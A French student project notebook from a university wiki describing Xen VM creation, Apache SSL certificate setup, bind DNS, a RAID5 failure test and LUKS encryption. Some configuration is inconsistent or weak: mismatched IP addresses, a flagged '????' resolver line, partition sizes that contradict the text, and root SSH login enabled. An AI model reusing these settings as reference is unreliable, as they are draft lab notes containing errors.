=====&amp;lt;span style=&amp;quot;color:#6B8E23&amp;quot;&amp;gt;''Certification SSL''&amp;lt;/span&amp;gt;=====&lt;br /&gt;
&lt;br /&gt;
Premièrement, sur Gandi nous lançons l'étape d'achat d'un certificat SSL. Puis, sur la VM nous générons le CSR grâce à cette commande:&lt;br /&gt;
&lt;br /&gt;
 root@IMA5-BANANE:/etc/apache2/sites-available/clef# openssl req -nodes -newkey rsa:2048 -sha256 -keyout banane.key -out banane.csr&lt;br /&gt;
 Generating a 2048 bit RSA private key&lt;br /&gt;
 If you enter '.', the field will be left blank.&lt;br /&gt;
 -----&lt;br /&gt;
 Country Name (2 letter code) [AU]:FR&lt;br /&gt;
 State or Province Name (full name) [Some-State]:Nord&lt;br /&gt;
 Locality Name (eg, city) []:Lille&lt;br /&gt;
 Organization Name (eg, company) [Internet Widgits Pty Ltd]:PolytechLille&lt;br /&gt;
 Organizational Unit Name (eg, section) []:IMA&lt;br /&gt;
 Common Name (e.g. server FQDN or YOUR name) []:banane.space&lt;br /&gt;
 Email Address []:&lt;br /&gt;
 A challenge password []:&lt;br /&gt;
 An optional company name []:&lt;br /&gt;
&lt;br /&gt;
 root@IMA5-BANANE:/etc/apache2/sites-available/clef# ls banane.csr banane.key&lt;br /&gt;
 root@IMA5-BANANE:/etc/apache2/sites-available/clef# cat banane.csr&lt;br /&gt;
 -----BEGIN CERTIFICATE REQUEST-----&lt;br /&gt;
 &amp;lt;CSR à renseigner sur Gandi lors de l'achat du certificat&amp;gt;&lt;br /&gt;
 -----END CERTIFICATE REQUEST-----&lt;br /&gt;
&lt;br /&gt;
Nous continuons donc la procédure pour obtenir le certificat, et attendons donc sa mise en place.&lt;br /&gt;
Pour recevoir le mail contenant le lien pour activer le certificat, nous installons les packages suivants :&lt;br /&gt;
&lt;br /&gt;
 root@IMA5-BANANE:~# apt-get install postfix mailx&lt;br /&gt;
&lt;br /&gt;
Une fois le certificat récupéré, nous les copions tous dans le bon répertoire, puis nous hashons le tout :&lt;br /&gt;
&lt;br /&gt;
 root@IMA5-BANANE:/etc/bind# cp certificat.crt /etc/ssl/certs/banane.space.crt&lt;br /&gt;
 root@IMA5-BANANE:/etc/bind# cp serveur.key /etc/ssl/private/banane.space.key&lt;br /&gt;
 root@IMA5-BANANE:/etc/bind# cp GandiStandardSSLCA2.pem /etc/ssl/certs/GandiStandardSSLCA2.pem&lt;br /&gt;
 root@IMA5-BANANE:/etc/bind# c_rehash /etc/ssl/certs&lt;br /&gt;
&lt;br /&gt;
Enfin, la dernière étape consiste en la modification des fichiers 000-banane.space-ssl.conf et ports.conf :&lt;br /&gt;
&lt;br /&gt;
 root@IMA5-BANANE:/etc/apache2/sites-available# cat 000-banane.space-ssl.conf &lt;br /&gt;
     &amp;lt;VirtualHost *:443&amp;gt;&lt;br /&gt;
         ServerName www.banane.space&lt;br /&gt;
         ServerAlias banane.space&lt;br /&gt;
         DocumentRoot /var/www/&lt;br /&gt;
         CustomLog /var/log/apache2/secure_access.log combined&lt;br /&gt;
         SSLEngine on&lt;br /&gt;
         SSLCertificateFile /etc/ssl/certs/banane.space.crt&lt;br /&gt;
         SSLCertificateKeyFile /etc/ssl/private/banane.space.key&lt;br /&gt;
         SSLCertificateChainFile /etc/ssl/certs/GandiStandardSSLCA2.pem&lt;br /&gt;
         SSLVerifyClient None&lt;br /&gt;
     &amp;lt;/VirtualHost&amp;gt;&lt;br /&gt;
&lt;br /&gt;
 root@IMA5-BANANE:/etc/apache2# cat ports.conf &lt;br /&gt;
 Listen 80&lt;br /&gt;
 &amp;lt;IfModule ssl_module&amp;gt;&lt;br /&gt;
 Listen 443&lt;br /&gt;
 &amp;lt;/IfModule&amp;gt;&lt;br /&gt;
 &amp;lt;IfModule mod_gnutls.c&amp;gt;&lt;br /&gt;
 Listen 443&lt;br /&gt;
 &amp;lt;/IfModule&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Un redémarrage du service apache2 est maintenant nécessaire :&lt;br /&gt;
&lt;br /&gt;
 root@IMA5-BANANE:/etc/apache2# service apache2 stop&lt;br /&gt;
 root@IMA5-BANANE:/etc/apache2# service apache2 start&lt;br /&gt;
 root@IMA5-BANANE:/etc/apache2# service apache2 reload&lt;br /&gt;
&lt;br /&gt;
Nous pouvons voir que notre site est maintenant sécurisé, un cadenas vert est bien présent.&lt;br /&gt;
&lt;br /&gt;
=====&amp;lt;span style=&amp;quot;color:#6B8E23&amp;quot;&amp;gt;''Serveur DNS''&amp;lt;/span&amp;gt;=====&lt;br /&gt;
&lt;br /&gt;
On commence par modifier les informations de notre nom de domaine sur le site de Gandi. Ensuite, dans ''&amp;quot;Gérer les Glue Records&amp;quot;'', nous modifions les informations concernant notre nom de domaine.&lt;br /&gt;
&lt;br /&gt;
* nom du serveur: ns.banane.space&lt;br /&gt;
* adresse IP: 193.48.57.179&lt;br /&gt;
* serveurs de nom:&lt;br /&gt;
** DNS1: ns.banane.space&lt;br /&gt;
** DNS2: ns6.gandi.net (serveur secondaire de Gandi)&lt;br /&gt;
&lt;br /&gt;
Une fois ces étapes effectuées, nous pouvons passer à la configuration du DNS avec bind. On se place alors dans le dossier /etc/bind de notre machine virtuelle.&lt;br /&gt;
Nous modifions dans un premier temps le fichier named.conf.local afin d'y créer nos zones :&lt;br /&gt;
&lt;br /&gt;
 root@IMA5-BANANE:/etc/bind# vim /etc/bind/named.conf.local&lt;br /&gt;
 zone &amp;quot;banane.space&amp;quot; IN {&lt;br /&gt;
             type master;&lt;br /&gt;
             file &amp;quot;/etc/bind/db.banane.space&amp;quot;;&lt;br /&gt;
        };&lt;br /&gt;
&lt;br /&gt;
On créée ensuite le fichier db.banane.space:&lt;br /&gt;
&lt;br /&gt;
 $TTL    604800&lt;br /&gt;
 @       IN      SOA     ns.banane.space. root.banane.space. (&lt;br /&gt;
                       2016113007       ; Serial&lt;br /&gt;
                         604800         ; Refresh&lt;br /&gt;
                          86400         ; Retry&lt;br /&gt;
                        2419200         ; Expire&lt;br /&gt;
                         604800 )       ; Negative Cache TTL&lt;br /&gt;
 ;&lt;br /&gt;
 @       IN      NS      ns.banane.space. &lt;br /&gt;
 @       IN      NS      ns6.gandi.net.&lt;br /&gt;
 ns      IN      A       193.48.57.162&lt;br /&gt;
 www     IN      A       193.48.57.162&lt;br /&gt;
 @       IN      A       193.48.57.162&lt;br /&gt;
 &lt;br /&gt;
&lt;br /&gt;
root@IMA5-BANANE:/etc/bind# vim /etc/resolv.conf&lt;br /&gt;
search banane.space&lt;br /&gt;
nameserver 193.48.57.162????&lt;br /&gt;
&lt;br /&gt;
====&amp;lt;span style=&amp;quot;color:#4169E1&amp;quot;&amp;gt;Sécurisation des données&amp;lt;/span&amp;gt;====&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
    1) vi /etc/xen/IMA5-BANANE.cfg&lt;br /&gt;
       lvcreate -L 10G -n /dev/virtual/banane-1 -v&lt;br /&gt;
       lvcreate -L 10G -n /dev/virtual/banane-2 -v&lt;br /&gt;
       lvcreate -L 10G -n /dev/virtual/banane-3 -v&lt;br /&gt;
&lt;br /&gt;
       root@cordouan:~# cat /etc/xen/IMA5-BANANE.cfg&lt;br /&gt;
       #&lt;br /&gt;
       # Configuration file for the Xen instance IMA5-BANANE, created&lt;br /&gt;
       # by xen-tools 4.5 on Mon Sep 11 19:01:21 2017.&lt;br /&gt;
       #&lt;br /&gt;
       #&lt;br /&gt;
       #  Kernel + memory size&lt;br /&gt;
       #&lt;br /&gt;
       kernel      = '/boot/vmlinuz-3.16.0-4-amd64'&lt;br /&gt;
       extra       = 'elevator=noop'&lt;br /&gt;
       ramdisk     = '/boot/initrd.img-3.16.0-4-amd64'&lt;br /&gt;
       vcpus       = '1'&lt;br /&gt;
       memory      = '512'&lt;br /&gt;
       #&lt;br /&gt;
       #  Disk device(s).&lt;br /&gt;
       #&lt;br /&gt;
       root        = '/dev/xvda2 ro'&lt;br /&gt;
       disk        = [&lt;br /&gt;
                  'file:/usr/local/xen/domains/IMA5-BANANE/disk.img,xvda2,w',&lt;br /&gt;
                  'file:/usr/local/xen/domains/IMA5-BANANE/swap.img,xvda1,w',&lt;br /&gt;
                  'phy:/dev/virtual/IMA5-BANANE-home,xvdb1,w',&lt;br /&gt;
  		  'phy:/dev/virtual/IMA5-BANANE-var,xvdc1,w',&lt;br /&gt;
                  'phy:/dev/virtual/banane-1,xvdd,w',&lt;br /&gt;
                  'phy:/dev/virtual/banane-2,xvde,w',&lt;br /&gt;
                  'phy:/dev/virtual/banane-3,xvdf,w',		 &lt;br /&gt;
       #&lt;br /&gt;
       #  Physical volumes&lt;br /&gt;
       #&lt;br /&gt;
       #&lt;br /&gt;
       #  Hostname&lt;br /&gt;
       #&lt;br /&gt;
       name        = 'IMA5-BANANE'  &lt;br /&gt;
       #&lt;br /&gt;
       #  Networking&lt;br /&gt;
       #&lt;br /&gt;
       vif         = [ 'ip=193.48.57.179/28 ,mac=00:16:3E:56:71:47,bridge=IMA5sc' ]       &lt;br /&gt;
       #&lt;br /&gt;
       #  Behaviour&lt;br /&gt;
       on_poweroff = 'destroy'&lt;br /&gt;
       on_reboot   = 'restart'&lt;br /&gt;
       on_crash    = 'restart'&lt;br /&gt;
&lt;br /&gt;
On reconfigure le fichier IMA5-BANANE.cfg en créant 3 nouvelles partitions LVM banane-X de 1 Go associées à notre VM.&lt;br /&gt;
&lt;br /&gt;
    2) xl console IMA5-BANANE&lt;br /&gt;
&lt;br /&gt;
On relance la MV IMA5-BANANE.&lt;br /&gt;
&lt;br /&gt;
    3) apt-get install mdadm&lt;br /&gt;
&lt;br /&gt;
Nous avons ensuite installé l paquetage mdadm puis rebooté la MV.&lt;br /&gt;
&lt;br /&gt;
    4) mdadm --create /dev/md0 --level=5 --assume-clean --raid-devices=3 /dev/xvdd /dev/xvde /dev/xvdf&lt;br /&gt;
&lt;br /&gt;
Nous créons le volume /dev/md0 pour créer un RAID5 logiciel avec les trois partitions obtenues. On sauvegarde ensuite la configuration actelle.&lt;br /&gt;
 root@IMA5-BANANE:~# mdadm --detail --scan &amp;gt;&amp;gt; /etc/mdadm/mdadm.conf&lt;br /&gt;
 root@IMA5-BANANE:~# mkfs /dev/md0&lt;br /&gt;
 root@IMA5-BANANE:~# mkdir /datamd0&lt;br /&gt;
 root@IMA5-BANANE:/datamd0# mount /dev/md0 /datamd0/&lt;br /&gt;
&lt;br /&gt;
Ensuite il faut éditer le fichier /etc/fstab en rajoutant la ligne suivante à la fin du fichier afin d'être sûr que la partition soit encore montée après le reboot:&lt;br /&gt;
 /dev/md0 /datamd0&lt;br /&gt;
&lt;br /&gt;
Nous créons un fichier texte sur le raid5:&lt;br /&gt;
 root@IMA5-BANANE:/datamd0# vim raid5test.txt&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Pour avoir le détail de la configuration actuelle:&lt;br /&gt;
&lt;br /&gt;
    5) root@IMA5-BANANE:~# mdadm --detail /dev/md0&lt;br /&gt;
 /dev/md0:&lt;br /&gt;
        Version : 1.2&lt;br /&gt;
  Creation Time : Wed Oct 25 18:27:13 2017&lt;br /&gt;
     Raid Level : raid5&lt;br /&gt;
     Array Size : 2095104 (2046.34 MiB 2145.39 MB)&lt;br /&gt;
  Used Dev Size : 1047552 (1023.17 MiB 1072.69 MB)&lt;br /&gt;
   Raid Devices : 3&lt;br /&gt;
  Total Devices : 3&lt;br /&gt;
    Persistence : Superblock is persistent&lt;br /&gt;
    Update Time : Wed Oct 25 17:03:20 2017&lt;br /&gt;
          State : clean &lt;br /&gt;
 Active Devices : 3&lt;br /&gt;
 Working Devices : 3&lt;br /&gt;
 Failed Devices : 0&lt;br /&gt;
  Spare Devices : 0&lt;br /&gt;
         Layout : left-symmetric&lt;br /&gt;
     Chunk Size : 512K&lt;br /&gt;
           Name : IMA5-BANANE:0  (local to host IMA5-BANANE)&lt;br /&gt;
           UUID : b70ad336:fb198d84:a5909f1c:f4b33229&lt;br /&gt;
         Events : 2&lt;br /&gt;
    Number   Major   Minor   RaidDevice State&lt;br /&gt;
       0     202       48        0      active sync   /dev/xvdd&lt;br /&gt;
       1     202       64        1      active sync   /dev/xvde&lt;br /&gt;
       2     202       80        2      active sync   /dev/xvdf&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
    6) root@IMA5-BANANE:~# mdadm --detail /dev/md0&lt;br /&gt;
 /dev/md0:&lt;br /&gt;
        Version : 1.2&lt;br /&gt;
  Creation Time : Wed Oct 25 18:27:13 2017&lt;br /&gt;
     Raid Level : raid5&lt;br /&gt;
     Array Size : 2095104 (2046.34 MiB 2145.39 MB)&lt;br /&gt;
  Used Dev Size : 1047552 (1023.17 MiB 1072.69 MB)&lt;br /&gt;
   Raid Devices : 3&lt;br /&gt;
  Total Devices : 2&lt;br /&gt;
    Persistence : Superblock is persistent&lt;br /&gt;
    Update Time : Wed Oct 25 18:51:56 2017&lt;br /&gt;
          State : clean, degraded &lt;br /&gt;
 Active Devices : 2&lt;br /&gt;
 Working Devices : 2&lt;br /&gt;
 Failed Devices : 0&lt;br /&gt;
  Spare Devices : 0&lt;br /&gt;
         Layout : left-symmetric&lt;br /&gt;
     Chunk Size : 512K&lt;br /&gt;
           Name : IMA5-BANANE:0  (local to host IMA5-BANANE)&lt;br /&gt;
           UUID : b70ad336:fb198d84:a5909f1c:f4b33229&lt;br /&gt;
         Events : 12&lt;br /&gt;
    Number   Major   Minor   RaidDevice State&lt;br /&gt;
       0       0        0        0      removed&lt;br /&gt;
       1     202       64        1      active sync   /dev/xvde&lt;br /&gt;
       2     202       80        2      active sync   /dev/xvdf&lt;br /&gt;
&lt;br /&gt;
Nous arrêtons la MV, mettons en commentaire la 1ère partition dans le fichier de configuration, puis redémarrons la machine.&lt;br /&gt;
&lt;br /&gt;
On voit bien qu'une partition a été supprimée mais que le fichier créé auparavant est toujours présent:&lt;br /&gt;
&lt;br /&gt;
 root@IMA5-BANANE:~# ls /datamd0/&lt;br /&gt;
 raid5test.txt&lt;br /&gt;
&lt;br /&gt;
Pour le test de réparation, afin de bien voir l'avancement de la reconstruction, nous avons procédé comme dans l'exemple du cours: Suppression de la partition xvdd:&lt;br /&gt;
&lt;br /&gt;
 root@IMA5-BANANE:~# mdadm --set-faulty /dev/md0 /dev/xvdd&lt;br /&gt;
 root@IMA5-BANANE:~# mdadm --remove /dev/md0 /dev/xvdd&lt;br /&gt;
 La partition est bien supprimée:&lt;br /&gt;
 Personalities : [raid6] [raid5] [raid4] &lt;br /&gt;
 md0 : active raid5 xvde[1] xvdf[2]&lt;br /&gt;
      2095104 blocks super 1.2 level 5, 512k chunk, algorithm 2 [3/2] [UU_]&lt;br /&gt;
&lt;br /&gt;
On remet à présent la partition supprimée:&lt;br /&gt;
 root@IMA5-BANANE:~# mdadm --add /dev/md0 /dev/xvdd&lt;br /&gt;
&lt;br /&gt;
On essaie ensuite de remonter le RAID5 et on peut constater l'avancement de la reconstruction en lançant la même commande assez régulièrement:&lt;br /&gt;
&lt;br /&gt;
    7) root@IMA5-BANANE:~# cat /proc/mdstat&lt;br /&gt;
 Personalities : [raid6] [raid5] [raid4] &lt;br /&gt;
 md0 : active raid5 xvdd[3] xvde[1] xvdf[2]&lt;br /&gt;
      2095104 blocks super 1.2 level 5, 512k chunk, algorithm 2 [3/2] [_UU]&lt;br /&gt;
      [===========&amp;gt;.........]  recovery = 59.7% (627140/1047552) finish=0.2min speed=28506K/sec&lt;br /&gt;
 unused devices: &amp;lt;none&amp;gt;&lt;br /&gt;
 root@IMA5-BANANE:~# cat /proc/mdstat&lt;br /&gt;
 Personalities : [raid6] [raid5] [raid4] &lt;br /&gt;
 md0 : active raid5 xvdd[3] xvde[1] xvdf[2]&lt;br /&gt;
      2095104 blocks super 1.2 level 5, 512k chunk, algorithm 2 [3/2] [_UU]&lt;br /&gt;
      [============&amp;gt;........]  recovery = 64.5% (676392/1047552) finish=0.2min speed=29408K/sec     &lt;br /&gt;
 unused devices: &amp;lt;none&amp;gt;&lt;br /&gt;
 root@IMA5-BANANE:~# cat /proc/mdstat&lt;br /&gt;
 Personalities : [raid6] [raid5] [raid4] &lt;br /&gt;
 md0 : active raid5 xvdd[3] xvde[1] xvdf[2]&lt;br /&gt;
      2095104 blocks super 1.2 level 5, 512k chunk, algorithm 2 [3/2] [_UU]&lt;br /&gt;
      [=============&amp;gt;.......]  recovery = 66.2% (695080/1047552) finish=0.2min speed=28961K/sec     &lt;br /&gt;
 unused devices: &amp;lt;none&amp;gt;&lt;br /&gt;
 root@IMA5-BANANE:~# cat /proc/mdstat&lt;br /&gt;
 Personalities : [raid6] [raid5] [raid4] &lt;br /&gt;
 md0 : active raid5 xvdd[3] xvde[1] xvdf[2]&lt;br /&gt;
      2095104 blocks super 1.2 level 5, 512k chunk, algorithm 2 [3/2] [_UU]&lt;br /&gt;
      [=============&amp;gt;.......]  recovery = 68.1% (714664/1047552) finish=0.1min speed=28586K/sec&lt;br /&gt;
 unused devices: &amp;lt;none&amp;gt;&lt;br /&gt;
 root@IMA5-BANANE:~# cat /proc/mdstat&lt;br /&gt;
 Personalities : [raid6] [raid5] [raid4] &lt;br /&gt;
 md0 : active raid5 xvdd[3] xvde[1] xvdf[2]&lt;br /&gt;
      2095104 blocks super 1.2 level 5, 512k chunk, algorithm 2 [3/2] [_UU]&lt;br /&gt;
      [==================&amp;gt;..]  recovery = 94.6% (991996/1047552) finish=0.0min speed=29206K/sec   &lt;br /&gt;
 unused devices: &amp;lt;none&amp;gt;&lt;br /&gt;
 root@IMA5-BANANE:~# cat /proc/mdstat&lt;br /&gt;
 Personalities : [raid6] [raid5] [raid4] &lt;br /&gt;
 md0 : active raid5 xvdd[3] xvde[1] xvdf[2]&lt;br /&gt;
      2095104 blocks super 1.2 level 5, 512k chunk, algorithm 2 [3/3] [UUU]     &lt;br /&gt;
 unused devices: &amp;lt;none&amp;gt;&lt;br /&gt;
&lt;br /&gt;
====&amp;lt;span style=&amp;quot;color:#4169E1&amp;quot;&amp;gt;Cryptage des données&amp;lt;/span&amp;gt;====&lt;br /&gt;
&lt;br /&gt;
 cryptsetup luksFormat -c aes -h sha256 /dev/mmcblk1&lt;br /&gt;
 cryptsetup luksOpen /dev/sdb1 crypt_sd&lt;br /&gt;
 mkfs.ext4 /dev/mapper/crypt_sd&lt;br /&gt;
 mount /dev/mapper/crypt_sd /mnt&lt;br /&gt;
 vi /mnt/test.txt #on marque un texte dans le fichier&lt;br /&gt;
 umount /mnt&lt;br /&gt;
 cryptsetup luksClose crypt_sd&lt;br /&gt;
&lt;br /&gt;
====&amp;lt;span style=&amp;quot;color:#4169E1&amp;quot;&amp;gt;Mise en réseau de la MV Xen IMA5-BANANE&amp;lt;/span&amp;gt;====&lt;/div&gt;</summary>
		<author><name>Hdelatte</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=Cahier_2017_groupe_n%C2%B05&amp;diff=46206</id>
		<title>Cahier 2017 groupe n°5</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=Cahier_2017_groupe_n%C2%B05&amp;diff=46206"/>
				<updated>2017-11-13T10:47:14Z</updated>
		
		<summary type="html">&lt;p&gt;Hdelatte : /* Certification SSL */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;==&amp;lt;span style=&amp;quot;color:#000080&amp;quot;&amp;gt;'''Présentation générale'''&amp;lt;/span&amp;gt;==&lt;br /&gt;
&lt;br /&gt;
===&amp;lt;span style=&amp;quot;color:#4169E1&amp;quot;&amp;gt;Mise en contexte&amp;lt;/span&amp;gt;===&lt;br /&gt;
&lt;br /&gt;
Le projet de Réseau Avancé est composé d'une partie commune et d'une tâche particulière par binôme. Ce projet consiste en la configuration d'une architecture réseau avec différentes parties, en plus du câblage et de la configuration des routeurs et commutateurs.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
La partie commune consiste en la création et la mise en réseau d'une machine virtuelle; ainsi que la création d'un site sécurisé avec la configuration du serveur SSH, DNS sécurisé et du certificat SSL. La virtualisation permet de faire fonctionner sur une même machine plusieurs OS isolés ou des logiciels grâce aux machines virtuelles. Au-delà de la réduction des coûts, la virtualisation permet aussi de manipuler et gérer plus facilement des OS. Cependant, on s'oriente de plus en plus vers l'isolation par des conteneurs car ils permettent au sein d'un même OS, d'isoler les ressources matérielles et d'éviter des surcharges.&lt;br /&gt;
&lt;br /&gt;
Notre tâche particulière est donc de réaliser la gestion des conteneurs au sein d'une machine virtuelle configurée en réseau.&lt;br /&gt;
&lt;br /&gt;
===&amp;lt;span style=&amp;quot;color:#4169E1&amp;quot;&amp;gt;Tâches à effectuer&amp;lt;/span&amp;gt;===&lt;br /&gt;
&lt;br /&gt;
* Création d'une machine virtuelle sur le serveur de virtualisation Cordouan&lt;br /&gt;
* Mettre la machine virtuelle en réseau&lt;br /&gt;
* Configuration des services Internet (Serveur SSH, DNS, DNSSEC, Certificat SSL)&lt;br /&gt;
* Crackage de clé Wi-Fi&lt;br /&gt;
* Créer les différents conteneurs et configurer leur accès au réseau (tâche particulière)&lt;br /&gt;
&lt;br /&gt;
==&amp;lt;span style=&amp;quot;color:#000080&amp;quot;&amp;gt;'''Travail effectué'''&amp;lt;/span&amp;gt;==&lt;br /&gt;
                     &lt;br /&gt;
====&amp;lt;span style=&amp;quot;color:#4169E1&amp;quot;&amp;gt;Création d'une machine virtuelle Xen sur Cordouan&amp;lt;/span&amp;gt;====&lt;br /&gt;
&lt;br /&gt;
On commence par créer une machine virtuelle Xen sur le serveur de virtualisation cordouan.insecserv.deule.net. On se connecte tout d'abord en SSH sur le serveur cordouan.&lt;br /&gt;
&lt;br /&gt;
    1) ssh root@cordouan.insecserv.deule.net&lt;br /&gt;
       Mot de passe: mot de passe root habituel&lt;br /&gt;
&lt;br /&gt;
On précise:&lt;br /&gt;
&lt;br /&gt;
* le nom de machine virtuelle: IMA5-BANANE&lt;br /&gt;
* son adresse IP sur le réseau: 193.48.57.179/28&lt;br /&gt;
* le répertoire où créer les disques virtuels: /usr/local/xen&lt;br /&gt;
* le miroir Debian: http://debian.polytech-lille.fr/debian&lt;br /&gt;
* la distribution: jessie (qui est la distribution stable courante)&lt;br /&gt;
&lt;br /&gt;
    2) xen-create-image --hostname=&amp;lt;IMA5-BANANE&amp;gt; --ip 193.48.57.179/28 --dir /usr/local/xen --netmask=255.255.255.240 --gateway=193.48.57.177 --mirror=http://debian.polytech-lille.fr/debian/ --dist=jessie&lt;br /&gt;
&lt;br /&gt;
On modifie le fichier de configuration de la machine virtuelle pour faire en sorte que les répertoires var et home de la machine virtuelle soient sur des partitions LVM de l'hôte. Installez les paquetages nécessaires pour SSH, le serveur Web apache2 et le serveur DNS bind (voir la partie services).&lt;br /&gt;
&lt;br /&gt;
    3) xl create /etc/xen/IMA5-BANANE.cfg&lt;br /&gt;
       vi /etc/xen/IMA5-BANANE.cfg&lt;br /&gt;
       lvcreate -L 10G -n /dev/virtual/IMA5-BANANE-home -v&lt;br /&gt;
       lvcreate -L 10G -n /dev/virtual/IMA5-BANANE-var -v&lt;br /&gt;
&lt;br /&gt;
       root@cordouan:~# cat /etc/xen/IMA5-BANANE.cfg&lt;br /&gt;
       #&lt;br /&gt;
       # Configuration file for the Xen instance IMA5-BANANE, created&lt;br /&gt;
       # by xen-tools 4.5 on Mon Sep 11 19:01:21 2017.&lt;br /&gt;
       #&lt;br /&gt;
       #&lt;br /&gt;
       #  Kernel + memory size&lt;br /&gt;
       #&lt;br /&gt;
       kernel      = '/boot/vmlinuz-3.16.0-4-amd64'&lt;br /&gt;
       extra       = 'elevator=noop'&lt;br /&gt;
       ramdisk     = '/boot/initrd.img-3.16.0-4-amd64'&lt;br /&gt;
       vcpus       = '1'&lt;br /&gt;
       memory      = '512'&lt;br /&gt;
       #&lt;br /&gt;
       #  Disk device(s).&lt;br /&gt;
       #&lt;br /&gt;
       root        = '/dev/xvda2 ro'&lt;br /&gt;
       disk        = [&lt;br /&gt;
                  'file:/usr/local/xen/domains/IMA5-BANANE/disk.img,xvda2,w',&lt;br /&gt;
                  'file:/usr/local/xen/domains/IMA5-BANANE/swap.img,xvda1,w',&lt;br /&gt;
                  'phy:/dev/virtual/IMA5-BANANE-home,xvdb1,w',&lt;br /&gt;
  		  'phy:/dev/virtual/IMA5-BANANE-var,xvdc1,w',		 &lt;br /&gt;
       #&lt;br /&gt;
       #  Physical volumes&lt;br /&gt;
       #&lt;br /&gt;
       #&lt;br /&gt;
       #  Hostname&lt;br /&gt;
       #&lt;br /&gt;
       name        = 'IMA5-BANANE'  &lt;br /&gt;
       #&lt;br /&gt;
       #  Networking&lt;br /&gt;
       #&lt;br /&gt;
       vif         = [ 'ip=193.48.57.179/28 ,mac=00:16:3E:56:71:47,bridge=IMA5sc' ]       &lt;br /&gt;
       #&lt;br /&gt;
       #  Behaviour&lt;br /&gt;
       on_poweroff = 'destroy'&lt;br /&gt;
       on_reboot   = 'restart'&lt;br /&gt;
       on_crash    = 'restart'&lt;br /&gt;
&lt;br /&gt;
On modifie le fichier de configuration en faisant en sorte que les répertoires var et home de la machine virtuelle soient sur des partitions LVM de l'hôte:&lt;br /&gt;
&lt;br /&gt;
* la mémoire attribuée: 512 Mo&lt;br /&gt;
* l'adresse ip de la MV: 193.48.57.179/28&lt;br /&gt;
* bridge: IMA5sc&lt;br /&gt;
&lt;br /&gt;
    4) xl list&lt;br /&gt;
&lt;br /&gt;
       root@cordouan:~# xl list&lt;br /&gt;
       Name                                        ID   Mem VCPUs	State	Time(s)&lt;br /&gt;
       Domain-0                                     0  1993     8     r-----   52219.3&lt;br /&gt;
       karmeliett                                   1   128     1     -b----    2483.6&lt;br /&gt;
       duvel                                        2   512     1     -b----    4225.6&lt;br /&gt;
       deus                                         3   512     1     -b----    4226.4&lt;br /&gt;
       trappe                                       4   512     1     -b----    4082.4&lt;br /&gt;
       Rincecochon                                  6   512     1     -b----    3788.2&lt;br /&gt;
       IMA5-Durian                                 62   512     1     -b----    3237.7&lt;br /&gt;
       IMA5-BANANE                                 84   512     1     -b----     152.9&lt;br /&gt;
       IMA5-Papaye                                 89   512     1     -b----      35.4&lt;br /&gt;
       IMA5-Ananas                                 91   512     1     -b----      27.0&lt;br /&gt;
&lt;br /&gt;
On vérifie que la MV IMA5-BANANE a bien été créée.&lt;br /&gt;
&lt;br /&gt;
    5) xl console IMA5-BANANE&lt;br /&gt;
&lt;br /&gt;
On lance IMA5-BANANE en utilisant le log root et le mot de passe configuré.&lt;br /&gt;
&lt;br /&gt;
====&amp;lt;span style=&amp;quot;color:#4169E1&amp;quot;&amp;gt;Services Internet (SSH, DNS sécurisé et certificat SSL)&amp;lt;/span&amp;gt;====&lt;br /&gt;
&lt;br /&gt;
On configure à présent les services Internet après avoir acheté un nom de domaine (https://www.banane.space) sur gandi.net pour créer notre site Web sécurisé.&lt;br /&gt;
&lt;br /&gt;
=====&amp;lt;span style=&amp;quot;color:#6B8E23&amp;quot;&amp;gt;''Serveur SSH''&amp;lt;/span&amp;gt;=====&lt;br /&gt;
&lt;br /&gt;
Sur notre machine virtuelle, nous avons configuré le fichier sshd_config (PubkeyAuthentication ) :&lt;br /&gt;
&lt;br /&gt;
       root@IMA5-BANANE:~# vim /etc/ssh/sshd_config&lt;br /&gt;
       &lt;br /&gt;
       RSAAuthentication yes&lt;br /&gt;
       PubkeyAuthentication yes&lt;br /&gt;
       #AuthorizedKeysFile     %h/.ssh/authorized_keys&lt;br /&gt;
       PermitRootLogin yes&lt;br /&gt;
       &lt;br /&gt;
       root@IMA5-BANANE:~# service ssh restart&lt;br /&gt;
&lt;br /&gt;
=====&amp;lt;span style=&amp;quot;color:#6B8E23&amp;quot;&amp;gt;''Certification SSL''&amp;lt;/span&amp;gt;=====&lt;br /&gt;
&lt;br /&gt;
Premièrement, sur Gandi nous lançons l'étape d'achat d'un certificat SSL. Puis, sur la VM nous générons le CSR grâce à cette commande:&lt;br /&gt;
&lt;br /&gt;
 root@IMA5-BANANE:/etc/apache2/sites-available/clef# openssl req -nodes -newkey rsa:2048 -sha256 -keyout banane.key -out banane.csr&lt;br /&gt;
 Generating a 2048 bit RSA private key&lt;br /&gt;
 If you enter '.', the field will be left blank.&lt;br /&gt;
 -----&lt;br /&gt;
 Country Name (2 letter code) [AU]:FR&lt;br /&gt;
 State or Province Name (full name) [Some-State]:Nord&lt;br /&gt;
 Locality Name (eg, city) []:Lille&lt;br /&gt;
 Organization Name (eg, company) [Internet Widgits Pty Ltd]:PolytechLille&lt;br /&gt;
 Organizational Unit Name (eg, section) []:IMA&lt;br /&gt;
 Common Name (e.g. server FQDN or YOUR name) []:banane.space&lt;br /&gt;
 Email Address []:&lt;br /&gt;
 A challenge password []:&lt;br /&gt;
 An optional company name []:&lt;br /&gt;
&lt;br /&gt;
 root@IMA5-BANANE:/etc/apache2/sites-available/clef# ls banane.csr banane.key&lt;br /&gt;
 root@IMA5-BANANE:/etc/apache2/sites-available/clef# cat banane.csr&lt;br /&gt;
 -----BEGIN CERTIFICATE REQUEST-----&lt;br /&gt;
 &amp;lt;CSR à renseigner sur Gandi lors de l'achat du certificat&amp;gt;&lt;br /&gt;
 -----END CERTIFICATE REQUEST-----&lt;br /&gt;
&lt;br /&gt;
Nous continuons donc la procédure pour obtenir le certificat, et attendons donc sa mise en place.&lt;br /&gt;
Pour recevoir le mail contenant le lien pour activer le certificat, nous installons les packages suivants :&lt;br /&gt;
&lt;br /&gt;
 root@IMA5-BANANE:~# apt-get install postfix mailx&lt;br /&gt;
&lt;br /&gt;
